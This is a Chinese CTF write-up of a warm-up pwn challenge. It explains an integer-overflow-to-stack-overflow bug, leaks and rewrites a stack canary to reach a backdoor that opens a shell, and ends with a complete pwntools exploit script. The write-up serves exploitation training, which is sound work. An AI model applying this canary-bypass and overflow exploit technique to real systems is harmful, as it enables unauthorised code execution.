签个到
居然是没开NX的,而且还有一个可写可执行的段
静态分析:
进入get()后可以看到,循环中如果heap[i] + 4LL处的内容与我们送入内容的前8字符相同,且送入内容+8处的内容(即canary)与heap[i]的前8字符相同,即可进入后门。
add(16,b'aaaaaaaa')
get(b'aaaaaaaa')
随便调试看看
read_len():
read_con():
sla('power length: ',0)
#以0来利用整型溢出漏洞,下面进行栈溢出
在linux下,int与unsigned int比较时会默认强制转换为unsigned int类型进行比较,所以a与b比较的时候,a会自动转换成unsigned int类型。由于负的signed int最高位(符号位)是1,转换成unsigned int之后,就会变成一个很大的unsigned int型正数。
可以进行很多次的read(0,&buf,1uLL)
sla('> ',add_idx)
sla('power length: ',0)
ru('name: ')
pl=b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff)
#var_10 heap_size 保持原来的堆块
#var_8 canary后半段
sla('> ',add_idx)
sla('power length: ',8)
ru('name: ')
可以看到第二次add时2c0处是canary后半段而不是00000886
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
li('(canary>>32)&0xffffffff) = '+hex((canary>>32)&0xffffffff))
s(pl)
choice(get_idx)
ru('data: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
sl(pl)
比较后getshell
#encoding = utf-8
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
from ctypes import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import *
# --- pwntools context / target selection ---------------------------------
# Architecture and logging for pwntools; the i386 alternative is kept
# commented out exactly as in the original harness template.
context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = "debug"

name = './pwn'
# NOTE: despite its name, a truthy `debug` talks to the remote service while a
# falsy one spawns the local binary (kept as-is so the switch behaves the same).
debug = 0
p = remote('172.52.16.218', 9999) if debug else process(name)

# System libc is used; the bundled-libc variant stays commented out.
libcso = '/lib/x86_64-linux-gnu/libc.so.6'
# libcso = './libc-2.31.so'
libc = ELF(libcso)
# libc = elf.libc
elf = ELF(name)
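# --- tube / packing shorthands --------------------------------------------
# Thin wrappers around the pwntools tube `p`; they only keep the interaction
# script short and carry no logic of their own.

def sendable(data):
    """Return `data` unchanged if it is bytes-like, otherwise str() it.

    The original wrappers called str() on every argument, which turns b'..'
    into the literal text "b'..'" — correct for the ints and strs this script
    passes, but silently wrong for byte payloads.
    """
    if isinstance(data, (bytes, bytearray)):
        return data
    return str(data)


s = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(sendable(delim), sendable(data))
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(sendable(delim), sendable(data))
r = lambda num: p.recv(num)
# drop=True (the default) strips the delimiter from the returned data.
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
itr = lambda: p.interactive()
# Unpack a short buffer as little-endian u32 / u64, zero-padding on the right.
# The fill value must be bytes: the original uu32 used the str '\x00' and
# raised TypeError whenever it was handed bytes.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))
# Read up to a 0x7f / 0xf7 byte and unpack the trailing 6 / 4 bytes.
l64 = lambda: u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
l32 = lambda: u32(p.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
# Coloured progress prints (orange / red).
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')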
# Terminal used by gdb.attach() inside dbg().
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']

# Menu option numbers of the target binary (selected at the '> ' prompt).
# NOTE: option 2 is the one get() below sends, despite being named delete_idx.
add_idx, delete_idx, edit_idx, show_idx = 1, 2, 3, 4
def dbg():
    """Attach gdb to the running target and pause until the user resumes."""
    target_pid = proc.pidof(p)[0]
    gdb.attach(target_pid)
    pause()
bss = elf.bss()  # not used anywhere below; left over from the harness template
# Canary read-back: answer the 'who are u?' prompt with 9 bytes, skip the 8
# 'a's echoed back, then take the next 8 bytes. 0x61 is ord('a'); the
# subtraction presumably compensates for the 9th 'a' overlapping the value
# that is read back — confirm against the binary's read/echo logic.
ru('who are u?\n')
s(b'a'*9)
ru('aaaaaaaa')
canary = uu64(p.recv(8))-0x61
li(hex(canary))
def choice(cho):
    """Pick menu entry `cho` once the '> ' prompt has arrived."""
    p.sendlineafter('> ', str(cho))
def add(size, con):
    """Menu option add_idx: answer the length prompt with `size`, then send `con` (plus newline) at the name prompt."""
    p.sendlineafter('> ', str(add_idx))
    p.sendlineafter('power length: ', str(size))
    p.recvuntil('name: ', True)
    p.sendline(con)
def get(data):
    """Menu option delete_idx (the binary's get()): wait for 'data: ' and send `data` raw, without a newline."""
    p.sendlineafter('> ', str(delete_idx))
    p.recvuntil('data: ', True)
    p.send(data)
# --- interaction sequence (mirrors the walkthrough above) ------------------
# First add with length 0: per the read_len() notes above this takes the
# integer-overflow path, so the byte-by-byte read continues past the intended
# length and reaches the stack slots noted there (var_10 = heap size,
# var_8 = low half of the canary).
sla('> ',add_idx)
sla('power length: ',0)
ru('name: ')
# 0x14 bytes of filler, then the original heap size written back unchanged
# (keeps the existing chunk, per the walkthrough) and the low 32 bits of the
# canary read back earlier.
pl=b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff)
li('canary&0xffffffff = '+hex(canary&0xffffffff))
sl(pl)
# Second add, length 8: the high 32 bits of the canary plus 4 filler bytes
# (the walkthrough notes offset 0x2c0 then holds the canary's upper half).
# Sent with s(), i.e. without a trailing newline — presumably because exactly
# 8 bytes are read here; confirm against read_con().
sla('> ',add_idx)
sla('power length: ',8)
ru('name: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
li('(canary>>32)&0xffffffff) = '+hex((canary>>32)&0xffffffff))
s(pl)
# Menu entry delete_idx is the binary's get(); the same 8 bytes (this time
# with a newline) satisfy the comparison described in the static analysis
# at the top, after which the session is handed to the user.
choice(delete_idx)
ru('data: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
sl(pl)
itr()
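# (removed: a dead module-level string literal holding a commented-out
#  pwn()/__main__ wrapper that was never executed)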